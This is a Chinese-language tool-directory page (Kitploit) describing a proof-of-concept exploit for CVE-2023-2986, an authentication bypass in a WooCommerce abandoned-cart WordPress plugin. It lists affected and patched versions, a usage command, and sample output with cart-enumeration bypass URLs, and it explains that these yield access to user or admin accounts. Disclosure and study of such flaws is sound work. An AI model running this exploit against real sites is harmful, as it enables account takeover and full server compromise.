Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-2986 — WordPress 中 'Abandoned Cart Lite for WooCommerce' 插件漏洞 CVE-2023-2986 的概念验证 | Kitploit
工具/GitHubGitHub/ayantaker/cve-2023-2986
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubayantaker/cve-2023-2986

CVE-2023-2986

WordPress 中 'Abandoned Cart Lite for WooCommerce' 插件漏洞 CVE-2023-2986 的概念验证

查看仓库
632年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-2986 的原始概念验证(PoC)

WordPress 插件 'Abandoned Cart Lite for WooCommerce' 中漏洞 CVE-2023-2986 的概念验证

相关详情

  • NVD 链接:https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • 插件源码:https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • 受影响版本:version <= 5.14.2 version <= 5.15.1
  • 修补版本:5.15.0 5.15.2

更新

  • 原本认为 5.15.0 版本修复了该问题,但我发现并未完全修复,且此情况已更新。因此实际修补版本为 5.15.2

漏洞分析

  • Keysight 博客:https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium:https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

使用方法

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] 正在枚举购物车 ID:1
[+] 用户 'victim' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] 正在枚举购物车 ID:2
[*] 正在枚举购物车 ID:3
[+] 用户 'victim2' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] 正在枚举购物车 ID:4
[+] 用户 'user' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] 正在枚举购物车 ID:5

在浏览器中输入该 URL 即可获得对相应用户账户的访问权限。如果 WordPress 管理员用户本身也有条目,则此操作将导致管理员控制台被访问,从而导致 WordPress 服务器完全沦陷。

免责声明

本概念验证(POC)纯为学术研究及开发有效防御技术而创建,并非用于攻击未明确授权的系统。作者不对任何滥用此 POC 的行为负责。请负责任地使用。

下载工具